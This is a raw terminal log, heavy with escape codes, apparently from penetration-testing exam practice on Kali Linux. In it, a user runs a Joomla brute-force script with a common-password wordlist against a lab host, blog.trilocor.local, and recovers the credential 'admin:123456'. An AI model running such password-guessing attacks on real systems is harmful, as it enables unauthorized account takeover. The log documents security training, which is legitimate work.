~/CPTS/NIX01/user_list.txt#[39m#[K#[30D#######[4m.#[24m#[K#[27C[8:01:13]#[36D#[90mt
xt -usr ~/CPTS/NIX01/user_list.txt#[39m#[K#[35D#[11D#[4m-
#[24m#[K#[37C[8:01:13]#[46D#[90mpasswords.txt -usr
~/CPTS/NIX01/user_list.txt#[39m#[K#[45D########[4m-
#[24m#[K#[43C[8:01:13]#[52D#[90mworst-passwords.txt -usr
~/CPTS/NIX01/user_list.txt#[39m#[K#[51D######[4m/#[24m#[K#[47C[8:01:13]#[56D#[90m50
0-worst-passwords.txt -usr
~/CPTS/NIX01/user_list.txt#[39m#[K#[55D#[11D#[4m/#[24m#[K#[57C[8:01:13]#[66D#[90mPa
sswords/500-worst-passwords.txt -usr
~/CPTS/NIX01/user_list.txt#[39m#[K#[65D#[10D#[4m/#[24m#[K#[66C[8:01:13]#[75D#[90mse
clists/Passwords/500-worst-passwords.txt -usr
~/CPTS/NIX01/user_list.txt#[39m#[K#[74D########[4m/#[24m#[K#[72C[8:01:13]#[81D#[90m
share/seclists/Passwords/500-worst-passwords.txt -usr
~/CPTS/NIX01/user_list.txt#[39m#[K#[80D######[4m/#[24m#[K#[76C[8:01:13]#[85D#[90mus
r/share/seclists/Passwords/500-worst-passwords.txt -usr
~/CPTS/NIX01/user_list.txt#[39m#[K#[84D####[K#[79C[8:01:13]#[88D#[90mw
/usr/share/seclists/Passwords/500-worst-passwords.txt -usr
~/CPTS/NIX01/user_list.txt#[39m#[K#[87D########[K#[86C[8:01:13]#[95D#[90mlocal -
w /usr/share/seclists/Passwords/500-worst-passwords.txt -usr
~/CPTS/NIX01/user_list.txt#[39m#[K#[94D#[9D#[K#[95C[8:01:13]#[104D#[90mtrilocor.loc
al -w /usr/share/seclists/Passwords/500-worst-passwords.txt -usr
~/CPTS/NIX01/user_list.txt#[39m#[K#[103D######[K#[100C[8:01:13]#[109D#[90mblog.tril
ocor.local -w /usr/share/seclists/Passwords/500-worst-passwords.txt -usr
~/CPTS/NIX01/user_list.txt#[39m#[K#[108D########[K#[107C[8:01:13]#[116D#[90mhttp://
blog.trilocor.local -w /usr/share/seclists/Passwords/500-worst-passwords.txt -usr
~/CPTS/NIX01/user_list.txt#[39m#[K#[115D
#[J#[0;1;2mfile#[0m
#[J#[01;32mjoomla-brute.py#[0m* #[JREADME.md #[Jtest.py
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
#[90mhttp://blog.trilocor.local -w /usr/share/seclists/Passwords/500-worst-
passwords.txt -usr
~/CPTS/NIX01/user_list.txt#[39m#[K#[0m#[115D#[K#[107C[8:01:13]#[117D#[90m
http://blog.trilocor.local -w /usr/share/seclists/Passwords/500-worst-passwords.txt
-usr ~/CPTS/NIX01/user_list.txt#[39m#[K#[116D##[K#[109C[8:01:13]#[118D#[90mu
http://blog.trilocor.local -w /usr/share/seclists/Passwords/500-worst-passwords.txt
-usr ~/CPTS/NIX01/user_list.txt#[39m#[K#[117D##[K#[110C[8:01:13]#[119D#[90m-u
http://blog.trilocor.local -w /usr/share/seclists/Passwords/500-worst-passwords.txt
-usr ~/CPTS/NIX01/user_list.txt#[39m#[K#[118D
#[J#[0;1;2mfile#[0m
#[J#[01;32mjoomla-brute.py#[0m* #[JREADME.md #[Jtest.py
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m #[90m-u
http://blog.trilocor.local -w /usr/share/seclists/Passwords/500-worst-passwords.txt
-usr ~/CPTS/NIX01/user_list.txt#[39m#[K#[0m#[118D#[K#[110C[8:01:13]#[120D#[90m -u
http://blog.trilocor.local -w /usr/share/seclists/Passwords/500-worst-passwords.txt
-usr ~/CPTS/NIX01/user_list.txt#[39m#[K#[119D
#[J#[0;1;2mfile#[0m
#[01;32mjoomla-brute.py#[0m*
#[0;1;2mPython script#[0m
#[J#[01;32mjoomla-brute.py#[0m*#[J#[4A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m#[90m -u
http://blog.trilocor.local -w /usr/share/seclists/Passwords/500-worst-passwords.txt
-usr ~/CPTS/NIX01/user_list.txt#[39m#[K#[0m#[119D#[K#[111C[8:01:13]#[120D#[?1l#>#[?
2004l
#[J#[A#[34C
#]2;kali@kali:~/Tools/joomla-bruteforce##]1;..la-bruteforce##]7;file:///home/kali/
Tools/joomla-bruteforce#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools/joomla-
bruteforce#[0;34m#[1m]#[0m#[0m - #[0;34m#[1m[#[0m#[0;33m929#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[8:01:25]#[148D#[?1h#=#[?
2004h
#[J#[A#[35C##[0m ###
#[J#[0;1;2mfile#[0m
#[01;32mjoomla-brute.py#[0m*
#[0;1;2mPython script#[0m
#[J#[01;32mjoomla-brute.py#[0m*#[J#[4A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-
brute.py#[24m#[K#[111C[8:01:25]#[0m#[122D#[1C
#[J#[0;1;2mfile#[0m
#[01;32mjoomla-brute.py#[0m*
#[0;1;2mPython script#[0m
#[J#[01;32mjoomla-brute.py#[0m*#[J#[4A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-
brute.py#[24m#[K#[111C[8:01:25]#[0m#[121D#[1C
#[J#[0;1;2mfile#[0m
#[01;32mjoomla-brute.py#[0m*
#[0;1;2mPython script#[0m
#[J#[01;32mjoomla-brute.py#[0m*#[J#[4A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-
brute.py#[24m#[K#[111C[8:01:25]#[0m#[120D####[4m.#[24m#[24m #[24m
###[90mpy#[39m###[30m#[103m#[39m#[49m#[30m#[103m#[39m#[49m
#[J#[0;1;2mfile#[0m
#[01;32mjoomla-brute.py#[0m*
#[0;1;2mPython script#[0m
#[01;32mjoomla-brute.py#[0m*
#[J#[0;2m#[1mcommon substring:#[0m #[30m#[103mjoomla-
brute.py#[39m#[49m#[5A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-
brute.#[24m#[90mpy#[39m#[K#[111C[8:01:25]#[0m#[122D########[4m-#[24m#[24m #[24m
#[24m #[24m #[24m #[24m #[39m #[39m #[8D#[90mbrute.py#[39m#[8D########[24m #[24m
#[24m #[24m #[24m #[24m #[24m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[15D#[90mjoomla-brute.py#[39m#[15D#[8D#[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[23D#[90mpython3 joomla-brute.py#[39m#[23D######[24m#[39m #[24m#[39m
#[24m#[39m #[24m#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[28D
#[J#[A#[6C
#[J#[A#[154C##[0m ####
#[J#[0;1;2mfile#[0m
#[J#[0muser_list.txt#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
http://blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr #[4m~/CPTS/NIX01/user_list.txt#[24m#[K#[0m########
#[J#[0;1;2mfile#[0m
#[J#[0muser_list.txt#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
http://blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr #[4m~/CPTS/NIX01/user_list.txt#[24m#[K#[0m#[8D###########
#[J#[0;1;2mfile#[0m
#[J#[0muser_list.txt#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
http://blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr #[4m~/CPTS/NIX01/user_list.txt#[24m#[K#[0m#[19D#####
#[J#[0;1;2mfile#[0m
#[J#[0muser_list.txt#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
http://blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr #[4m~/CPTS/NIX01/user_list.txt#[24m#[K#[0m#[24D#
#[J#[0;1;2mnamed directory#[0m
#[J#[0mautocomplete #[Jautocomplete-log #[Jzsh-
autocomplete#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
http://blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr #[4m~/CPTS/NIX01/user_list.txt#[24m#[K#[0m#[25D##
#[J#[A#[124C
#]2;kali@kali:~/Tools/joomla-bruteforce##]1;..la-bruteforce##]7;file:///home/kali/
Tools/joomla-bruteforce#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools/joomla-
bruteforce#[0;34m#[1m]#[0m#[0m - #[0;34m#[1m[#[0m#[0;33m930#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[8:01:42]#[148D#[?1h#=#[?
2004h
#[J#[A#[152C##[0m ####
#[J#[0;1;2mfile#[0m
#[J#[0muser_list.txt#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
http://blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -U #[4m~/CPTS/NIX01/user_list.txt#[24m#[K#[0m###################
#[J#[0;1;2mfile#[0m
#[J#[0muser_list.txt#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
http://blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -U
#[4m~/CPTS/NIX01/user_list.txt#[24m#[K#[0m#[19D###############[10D##########
#[J#[0;1;2mfile#[0m
#[J#[0m500-worst-passwords.txt #[J#[01;31m500-worst-
passwords.txt.bz2#[0m#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
http://blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -U #[4m~/CPTS/NIX01/user_list.txt#[24m#[K#[0m#[53D#[10D#[9D
#[J#[0;1;2mfile#[0m
#[J#[0m500-worst-passwords.txt #[J#[01;31m500-worst-
passwords.txt.bz2#[0m#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
http://blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -U #[4m~/CPTS/NIX01/user_list.txt#[24m#[K#[0m#[72D##########
#[J#[0;1;2mfile#[0m
#[J#[0m500-worst-passwords.txt #[J#[01;31m500-worst-
passwords.txt.bz2#[0m#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
http://blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -U #[4m~/CPTS/NIX01/user_list.txt#[24m#[K#[0m#[82D#####
#[J#[A#[A#[78C#[1B
#]2;kali@kali:~/Tools/joomla-bruteforce##]1;..la-bruteforce##]7;file:///home/kali/
Tools/joomla-bruteforce#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools/joomla-
bruteforce#[0;34m#[1m]#[0m#[0m - #[0;34m#[1m[#[0m#[0;33m931#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[8:02:11]#[148D#[?1h#=#[?
2004h
#[J#[A#[147C######[4m.#[24m#[K#[2C[8:02:11]#[11D#[90mtxt#[39m#[K###
#[J#[0;1;2mfile#[0m
#[J#[0muser_list.txt#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr
#[4m~/CPTS/NIX01/user_list.#[24m#[90mtxt#[39m#[K#[0m##########[4m_#[24m#[K#[7C[8:02
:11]#[16D#[90mlist.txt#[39m#[K#[8D#######[4m/
#[24m#[K#[12C[8:02:11]#[21D#[90muser_list.txt#[39m#[K#[13D
#[J#[0;1;2mfile#[0m
#[J#[0mhydra.restore #[Jmain_wordlist.txt #[Jrequest.txt
#[JUninstaller.lnk #[Juser_list.txt #[JZoneTransfer.txt
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr
#[4m~/CPTS/NIX01/#[24m#[90muser_list.txt#[39m#[K#[0m#[13D########[4m/
#[24m#[K#[18C[8:02:11]#[27D#[90mNIX01/user_list.txt#[39m#[K#[19D
#[J#[0;1;2mdirectory#[0m
#[01;34mNIX01#[0m/
#[01;34mTerminalLogs#[0m/
#[0;1;2mfile#[0m
#[J#[0mBurpSuite_cert #[JHTB\ Certified\ Penetration\ Testing\ Specialist.ovpn
#[Jzap_root_ca.cer #[J#[4A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr
#[4m~/CPTS/#[24m#[90mNIX01/user_list.txt#[39m#[K#[0m#[19D#######[4m/
#[24m#[K#[23C[8:02:11]#[32D#[90mCPTS/NIX01/user_list.txt#[39m#[K#[24D
#[J#[0;1;2mdirectory#[0m
#[01;34m2024-05-02-ZAP-Report-#[0m/ #[01;34m2024-05-02-ZAP-Report-2#[0m/
#[01;34m2024-05-02-ZAP-Report-3#[0m/ #[01;34mCPTS#[0m/ #[01;34mCTF#[0m/
#[01;34mDesktop#[0m/ #[01;34mDownloads#[0m/ #[01;34mSQLiteStudio#[0m/
#[01;34mTools#[0m/ #[01;34m 模板#[0m/
#[0;1;2mfile#[0m
#[J#[0m2024-05-02-ZAP-Report-.html
#[Jscript.log
#[J#[4A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr
#[4m~/#[24m#[90mCPTS/NIX01/user_list.txt#[39m#[K#[0m#[24D###[4m~#[24m#[K#[24C[8:02:
11]#[33D#[90m/CPTS/NIX01/user_list.txt#[39m#[K#[25D
#[J#[0;1;2mnamed directory#[0m
#[J#[0mautocomplete #[Jautocomplete-log #[Jzsh-
autocomplete#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr
#[4m~#[24m#[90m/CPTS/NIX01/user_list.txt#[39m#[K#[0m#[25D##[K#[25C[8:02:11]#[34D#[9
0m~/CPTS/NIX01/user_list.txt#[39m#[K#[26D
#[J#[0;1;2mfile#[0m
#[J#[01;32mjoomla-brute.py#[0m* #[JREADME.md #[Jtest.py
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr
#[90m~/CPTS/NIX01/user_list.txt#[39m#[K#[0m#[26D#[39ma#[K#[24C[8:02:11]#[33D
#[J#[0;1;2mfile#[0m
#[J#[01;32mjoomla-brute.py#[0m* #[JREADME.md #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr a#[K#[24C[8:02:11]#[0m#[33Ddmin
#[J#[A#[125C
#]2;kali@kali:~/Tools/joomla-bruteforce##]1;..la-bruteforce##]7;file:///home/kali/
Tools/joomla-bruteforce#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools/joomla-
bruteforce#[0;34m#[1m]#[0m#[0m - #[0;34m#[1m[#[0m#[0;33m933#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[8:16:40]#[148D#[?1h#=#[?
2004h
#[J#[A#[126C##[0m ######
#[J#[0;1;2mfile#[0m
#[J#[01;32mjoomla-brute.py#[0m* #[JREADME.md #[Jtest.py
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr
admin#[K#[20C[8:16:40]#[0m#[34D#####[110D#[24m#[39ms#[24m#[39mu#[24m#[39md#[24m#[39
mo #[39mp#[39my#[39mt#[39mh#[39mo#[39mn#[39m3
#[24mj#[24mo#[24mo#[24mm#[24ml#[24ma#[24m-
#[24mb#[24mr#[24mu#[24mt#[24me#[24m.#[24mp#[24my#[27C#[24m/
#[24mu#[24ms#[24mr#[24m/#[24ms#[24mh#[24ma#[24mr#[24me#[24m/
#[24ms#[24me#[24mc#[24ml#[24mi#[24ms#[24mt#[24ms#[24m/
#[24mP#[24ma#[24ms#[24ms#[24mw#[24mo#[24mr#[24md#[24ms#[24m/
#[24m5#[24m0#[24m0#[24m-#[24mw#[24mo#[24mr#[24ms#[24mt#[24m-
#[24mp#[24ma#[24ms#[24ms#[24mw#[24mo#[24mr#[24md#[24ms#[24m.#[24mt#[24mx#[24mt#[2C#
#####[10D#######[89D#[4m#[32ms#[4m#[32mu#[4m#[32md#[4m#[32mo#[24m#[39m
#[32mp#[32my#[32mt#[32mh#[32mo#[32mn#[32m3#[39m #[4mj#[4mo#[4mo#[4mm#[4ml#[4ma#[4m-
#[4mb#[4mr#[4mu#[4mt#[4me#[4m.#[4mp#[4my#[24m#[27C#[4m/#[4mu#[4ms#[4mr#[4m/
#[4ms#[4mh#[4ma#[4mr#[4me#[4m/#[4ms#[4me#[4mc#[4ml#[4mi#[4ms#[4mt#[4ms#[4m/
#[4mP#[4ma#[4ms#[4ms#[4mw#[4mo#[4mr#[4md#[4ms#[4m/#[4m5#[4m0#[4m0#[4m-
#[4mw#[4mo#[4mr#[4ms#[4mt#[4m-
#[4mp#[4ma#[4ms#[4ms#[4mw#[4mo#[4mr#[4md#[4ms#[4m.#[4mt#[4mx#[4mt#[24m#[19D#####[10
D#[9D#####################[9D#####
#[J#[A#[38Chblog.trilocor.local -w#[24m
#[4m/#[4mu#[4ms#[4mr#[4m/#[4ms#[4mh#[4ma#[4mr#[4me#[4m/#[4ms#[4me#[4mc#[4ml#[4mi#[4
ms#[4mt#[4ms#[4m/#[4mP#[4ma#[4ms#[4ms#[4mw#[4mo#[4mr#[4md#[4ms#[4m/
#[4m5#[4m0#[4m0#[4m-#[4mw#[4mo#[4mr#[4ms#[4mt#[4m-
#[4mp#[4ma#[4ms#[4ms#[4mw#[4mo#[4mr#[4md#[4ms#[4m.#[4mt#[4mx#[4mt#[24m -usr
admin#[87Dtblog.trilocor.local -w#[24m
#[4m/#[4mu#[4ms#[4mr#[4m/#[4ms#[4mh#[4ma#[4mr#[4me#[4m/#[4ms#[4me#[4mc#[4ml#[4mi#[4
ms#[4mt#[4ms#[4m/#[4mP#[4ma#[4ms#[4ms#[4mw#[4mo#[4mr#[4md#[4ms#[4m/
#[4m5#[4m0#[4m0#[4m-#[4mw#[4mo#[4mr#[4ms#[4mt#[4m-
#[4mp#[4ma#[4ms#[4ms#[4mw#[4mo#[4mr#[4md#[4ms#[4m.#[4mt#[4mx#[4mt#[24m -usr
admin#[87Dtblog.trilocor.local -w#[24m
#[4m/#[4mu#[4ms#[4mr#[4m/#[4ms#[4mh#[4ma#[4mr#[4me#[4m/#[4ms#[4me#[4mc#[4ml#[4mi#[4
ms#[4mt#[4ms#[4m/#[4mP#[4ma#[4ms#[4ms#[4mw#[4mo#[4mr#[4md#[4ms#[4m/
#[4m5#[4m0#[4m0#[4m-#[4mw#[4mo#[4mr#[4ms#[4mt#[4m-
#[4mp#[4ma#[4ms#[4ms#[4mw#[4mo#[4mr#[4md#[4ms#[4m.#[4mt#[4mx#[4mt#[24m -usr
admin#[87Dpblog.trilocor.local -w#[24m
#[4m/#[4mu#[4ms#[4mr#[4m/#[4ms#[4mh#[4ma#[4mr#[4me#[4m/#[4ms#[4me#[4mc#[4ml#[4mi#[4
ms#[4mt#[4ms#[4m/#[4mP#[4ma#[4ms#[4ms#[4mw#[4mo#[4mr#[4md#[4ms#[4m/
#[4m5#[4m0#[4m0#[4m-#[4mw#[4mo#[4mr#[4ms#[4mt#[4m-
#[4mp#[4ma#[4ms#[4ms#[4mw#[4mo#[4mr#[4md#[4ms#[4m.#[4mt#[4mx#[4mt#[24m -usr
admin#[87D:blog.trilocor.local -w#[24m
#[4m/#[4mu#[4ms#[4mr#[4m/#[4ms#[4mh#[4ma#[4mr#[4me#[4m/#[4ms#[4me#[4mc#[4ml#[4mi#[4
ms#[4mt#[4ms#[4m/#[4mP#[4ma#[4ms#[4ms#[4mw#[4mo#[4mr#[4md#[4ms#[4m/
#[4m5#[4m0#[4m0#[4m-#[4mw#[4mo#[4mr#[4ms#[4mt#[4m-
#[4mp#[4ma#[4ms#[4ms#[4mw#[4mo#[4mr#[4md#[4ms#[4m.#[4mt#[4mx#[4mt#[24m -usr
admin#[87D/blog.trilocor.local -w#[24m
#[4m/#[4mu#[4ms#[4mr#[4m/#[4ms#[4mh#[4ma#[4mr#[4me#[4m/#[4ms#[4me#[4mc#[4ml#[4mi#[4
ms#[4mt#[4ms#[4m/#[4mP#[4ma#[4ms#[4ms#[4mw#[4mo#[4mr#[4md#[4ms#[4m/
#[4m5#[4m0#[4m0#[4m-#[4mw#[4mo#[4mr#[4ms#[4mt#[4m-
#[4mp#[4ma#[4ms#[4ms#[4mw#[4mo#[4mr#[4md#[4ms#[4m.#[4mt#[4mx#[4mt#[24m -usr
admin#[87D/blog.trilocor.local -w#[24m
#[4m/#[4mu#[4ms#[4mr#[4m/#[4ms#[4mh#[4ma#[4mr#[4me#[4m/#[4ms#[4me#[4mc#[4ml#[4mi#[4
ms#[4mt#[4ms#[4m/#[4mP#[4ma#[4ms#[4ms#[4mw#[4mo#[4mr#[4md#[4ms#[4m/
#[4m5#[4m0#[4m0#[4m-#[4mw#[4mo#[4mr#[4ms#[4mt#[4m-
#[4mp#[4ma#[4ms#[4ms#[4mw#[4mo#[4mr#[4md#[4ms#[4m.#[4mt#[4mx#[4mt#[24m -usr
admin#[87D#[?1l#>#[?2004l
#[J#[A#[45C
#[J#]2;sudo python3 joomla-brute.py -u http://blog.trilocor.local -w -usr
admin##]1;python3##[92m admin:123456#[0m
#[1m#[7m%#[27m#[1m#[0m
#]2;kali@kali:~/Tools/joomla-bruteforce##]1;..la-bruteforce##]7;file:///home/kali/
Tools/joomla-bruteforce#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools/joomla-
bruteforce#[0;34m#[1m]#[0m#[0m - #[0;34m#[1m[#[0m#[0;33m934#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[8:16:55]#[148D#[?1h#=#[?
2004h
#[J#[0;1;2mfile#[0m
#[J#[01;32mjoomla-brute.py#[0m* #[JREADME.md #[Jtest.py
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
http://blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr #[90madmin#[39m#[K#[13C[8:16:55]#[0m#[27D#[39mr#[39m #[39m
#[39m #[39m ####oot#[?1l#>#[?2004l
#[J#[A#[131C
#]2;kali@kali:~/Tools/joomla-bruteforce##]1;..la-bruteforce##]7;file:///home/kali/
Tools/joomla-bruteforce#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools/joomla-
bruteforce#[0;34m#[1m]#[0m#[0m - #[0;34m#[1m[#[0m#[0;33m935#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[8:17:03]#[148D#[?1h#=#[?
2004hs#sudo python2.7 -m pip install urllib3#[37D#[7ms#[7mu#[7md#[7mo#[7m
#[7mp#[7my#[7mt#[7mh#[7mo#[7mn#[7m2#[7m.#[7m7#[7m #[7m-#[7mm#[7m
#[7mp#[7mi#[7mp#[7m #[7mi#[7mn#[7ms#[7mt#[7ma#[7ml#[7ml#[7m
#[7mu#[7mr#[7ml#[7ml#[7mi#[7mb#[7m3#[27m#[37D#[27ms#[27mu#[27md#[27mo#[27m
#[27mp#[27my#[27mt#[27mh#[27mo#[27mn#[27m2#[27m.#[27m7#[27m #[27m-#[27mm#[27m
#[27mp#[27mi#[27mp#[27m #[27mi#[27mn#[27ms#[27mt#[27ma#[27ml#[27ml#[27m
#[27mu#[27mr#[27ml#[27ml#[27mi#[27mb#[27m3#[37D#[4m#[32ms#[4m#[32mu#[4m#[32md#[4m#[
32mo#[24m#[39m #[32mp#[32my#[32mt#[32mh#[32mo#[32mn#[32m2#[32m.#[32m7#[39m#[23C#[?
1l#>#[?2004l
#[J#[A#[43C
#]2;kali@kali:~/Tools/joomla-bruteforce##]1;..la-bruteforce##]7;file:///home/kali/
Tools/joomla-bruteforce#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools/joomla-
bruteforce#[0;34m#[1m]#[0m#[0m - #[0;34m#[1m[#[0m#[0;33m936#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[8:22:37]#[148D#[?1h#=#[?
2004h
#[J#[A#[44C##[0m #[8D#[8D####
#[J#[0;1;2mmodule#[0m
#[J#[0mpipes#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython2.7#[39m -m pip install
urllib3#[K#[102C[8:22:37]#[0m#[130D##pip install urllib3
#[21D#####[32m.#[39m#[39mpip install urllib3
#[22D#[8D#[1m#[31mp#[1m#[31my#[1m#[31mt#[1m#[31mh#[1m#[31mo#[1m#[31mn#[1m#[31m2#[1m
#[31m.#[1m#[31mp#[1m#[31mi#[1m#[31mp#[0m#[39m###########[1m#[31mi#[1m#[31mp#[0m#[39
m#[0m#[39m #[0m#[39mi#[0m#[39mn#[0m#[39ms#[0m#[39mt#[0m#[39ma#[0m#[39ml#[0m#[39ml
urllib3 #[27D#[0m#[32mp#[0m#[32mi#[0m#[32mp#[39m###
#[J#[0;1;2mexternal command#[0m
#[J#[0mpip #[Jpip3 #[Jpip3.11 #[Jpipal
#[Jpipesz #[Jpipewire #[Jpipewire-aes67 #[Jpipewire-avb
#[Jpipewire-pulse#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpip#[39m install
